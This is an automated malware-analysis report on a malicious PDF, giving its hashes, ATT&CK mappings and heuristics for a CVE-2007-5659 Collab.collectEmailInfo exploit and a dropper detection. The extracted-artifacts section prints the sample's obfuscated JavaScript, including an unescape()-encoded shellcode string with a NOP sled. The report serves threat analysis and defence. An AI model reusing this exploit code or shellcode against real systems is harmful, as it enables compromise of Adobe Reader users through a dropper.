Malicious PDF — malware analysis report

Static analysis result for SHA-256 6c3931a96dac5c05…

MALICIOUS

PDF

102.7 KB Created: 2008-03-03 17:06:20 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 6.0.1 (Windows))
MD5: c6ce2c2b6d214af0164d0de7aaa653c2 SHA-1: 64420cdf3e920f5b51d303c5012d7dbc743d592a SHA-256: 6c3931a96dac5c0560977c90fce766b2c2dd0110b04f68a76ad5a6d5078d5373
348 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF file contains embedded JavaScript that leverages the CVE-2007-5659 vulnerability (Collab.collectEmailInfo) and uses unescape() for obfuscation. The critical heuristics indicate a JavaScript exploit cluster, and ClamAV detected it as a dropper. The embedded JavaScript is designed to download and execute a secondary payload, characteristic of a dropper malware.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • ClamAV: Win.Trojan.Dropper-82 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Dropper-82
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/xhtml In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0033_000.js
a94ed7d0c010d078356a95fba1abc6601200b7b83eb811ee5f92813f20d13533		 pdf-javascript-stream PDF /JS object 33 at offset 0x151A 85 bytes
Preview script
First 1,000 lines of the extracted script
function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return
javascript_obj0035_001.js
03574e1d20835705dbdbe0505985a8472366bec2262ccb79f03184e327e7082a		 pdf-javascript-stream PDF /JS object 35 at offset 0x18527 5283 bytes
Detection
ClamAV: Win.Trojan.Dropper-82
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
sc = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655%u7353%u764f%u6f50%u6e4b%u7051%u7a53%u724f%u7457%u7850%u714c%u6e4c%u6d50%u7350%u724f%u
... (truncated)
combined_document_js_000.js
4181580af7a86bc508435de8b69342bea1fd497ec610939447a02c235508ed3b		 deobfuscated-js combined document JavaScript streams at offset 0x151A 5369 bytes
Detection
ClamAV: Win.Trojan.Dropper-82
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return 

function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
sc = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7456%u715a%u7053%u7050%u7050%u7050%u7059%u6b58%u7054%u6c50%u7059%u6b58%u7057%u6c51%u6d5a%u6b58%u7057%u7850%u7059%u794e%u6b58%u7250%u7050%u7050%u7855%u7059%u7158%u6c4e%u7050%u7250%u7050%u7050%u6b58%u6c4f%u7958%u7757%u7850%u7958%u7754%u7051%u6f4f%u7757%u7850%u7856%u6c4e%u7759%u7350%u6c50%u784e%u7a51%u7250%u7050%u7050%u7958%u7754%u6c51%u6f4f%u7757%u7850%u7856%u764f%u7252%u794b%u6c57%u784e%u7a50%u7250%u7050%u7050%u7059%u7958%u7754%u7052%u6f4f%u7757%u7850%u7856%u755a%u7751%u7050%u6c57%u784e%u794f%u7150%u7050%u7050%u7958%u7754%u7452%u6f4f%u7757%u7850%u7856%u6b4f%u7759%u6d4f%u6f50%u784e%u794e%u7150%u7050%u7050%u7059%u7958%u7754%u7852%u6f4f%u7757%u7850%u7856%u7651%u7556%u7a4f%u7051%u784e%u784d%u7150%u7050%u7050%u7958%u7754%u6c52%u6f4f%u7757%u7850%u7856%u6f51%u7957%u7a50%u784e%u784e%u784c%u7150%u7050%u7050%u7958%u7754%u7053%u7059%u7059%u7059%u7059%u7059%u7059%u6f4f%u7757%u7850%u7856%u6c5a%u7850%u7a4d%u7657%u784e%u724b%u7150%u7050%u7050%u7958%u7754%u7853%u6f4f%u7757%u7850%u7856%u7859%u6e4f%u7a58%u6e50%u784e%u725a%u7150%u7050%u7050%u7958%u7754%u6c53%u6f4f%u7757%u7850%u7856%u7457%u7958%u6c4e%u7959%u784e%u7259%u7150%u7050%u7050%u7958%u7754%u7054%u6f4f%u7757%u7850%u7856%u6e57%u784d%u724e%u7357%u784e%u7258%u7150%u7050%u7050%u7958%u7754%u7454%u6f4f%u7757%u7850%u7856%u6d5a%u6b59%u6d57%u6f4d%u784e%u7257%u7150%u7050%u7050%u7958%u7754%u7854%u7059%u7059%u7059%u7059%u7059%u7059%u7353%u764f%u7654%u6d58%u7754%u7056%u7055%u7655%u6f4f%u7755%u7854%u7358%u784f%u6f4f%u7457%u724f%u6d53%u7050%u7051%u7050%u7050%u7657%u6b4e%u7958%u7754%u7450%u7958%u7757%u7056%u6f4f%u7757%u7450%u7a56%u7054%u6f4f%u7755%u6c51%u7958%u7754%u6c55%u7a56%u7050%u7a56%u7050%u7a56%u7050%u6f4f%u7757%u7056%u6f4f%u7755%u7853%u7358%u784f%u6f4f%u7457%u7756%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6f4f%u7757%u7450%u6f4f%u7757%u6c55%u6f4f%u7757%u7056%u6f4f%u7755%u6c52%u6b58%u6f54%u7057%u7358%u794e%u7051%u6b58%u7754%u6c55%u7054%u7158%u7853%u7654%u6e52%u7a55%u7856%u7557%u7950%u7158%u7857%u7450%u7352%u7650%u7158%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7653%u7358%u704c%u7850%u7958%u7754%u7451%u7054%u7158%u7853%u7a54%u7557%u7356%u6b54%u7557%u7950%u7158%u7857%u7450%u7251%u7150%u7358%u7951%u7457%u7450%u724e%u6c4e%u6b4e%u7a51%u7358%u704c%u7850%u7958%u7754%u7851%u7054%u7158%u7853%u7654%u7954%u7654%u7154%u7557%u7950%u7158%u7857%u7450%u7350%u7750%u7358%u7951%u7457%u7251%u724e%u6c4e%u6f4f%u7757%u6c55%u6f4f%u7755%u7052%u6f50%u7558%u7655%u6f4f%u6f4f%u6f4f%u7059%u7059%u7059%u7059%u7958%u7754%u7457%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6b58%u6f55%u7051%u7358%u734c%u7451%u7355%u6f4f%u7755%u7452%u7958%u7754%u7857%u7a56%u7050%u7a56%u7250%u7a56%u7250%u7a56%u7050%u7a56%u7350%u7856%u7050%u7050%u7050%u7054%u6f4f%u7757%u7051%u6f4f%u7755%u7452%u7958%u7754%u7456%u7059%u7059%u7059%u7059%u7059%u7059%u7059%u6b58%u7754%u7851%u6b52%u7754%u7451%u7358%u784e%u7850%u6b58%u6f55%u7451%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7851%u6b52%u6f55%u7451%u7358%u6b4e%u7850%u7355%u6f4f%u7757%u7451%u6f4f%u7757%u7456%u6f4f%u7755%u7053%u6f4f%u7757%u7456%u6f4f%u7755%u7852%u6b58%u7754%u7457%u6b52%u7754%u7851%u6b58%u6f55%u7851%u7053%u7350%u7354%u7854%u7358%u784f%u7050%u7557%u774f%u7a56%u7050%u6d58%u6f55%u7057%u7355%u6b58%u6f55%u7457%u6b52%u6f55%u7851%u7355%u6f4f%u7757%u7851%u6f4f%u7757%u7857%u6f4f%u7755%u7053%u6f4f%u7757%u7857%u6f4f%u7755%u7852%u7a56%u7050%u6f4f%u7757%u7051%u6f4f%u7755%u6c53%u7a56%u7050%u6b58%u6f55%u7051%u7358%u734c%u7950%u7355%u6f4f%u7755%u6c53%u7a56%u7050%u6f4f%u7755%u7454%u7555%u6b58%u6c4e%u7755%u6b58%u6d57%u7850%u6b58%u6d55%u6c50%u7655%u6b58%u7357%u6c53%u6b58%u7457%u7353%u7857%u7350%u734f%u7655%u6b58%u7657%u7052%u7350%u734f%u7353%u794c%u7954%u7154%u6d5a%u7350%u734c%u7655
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.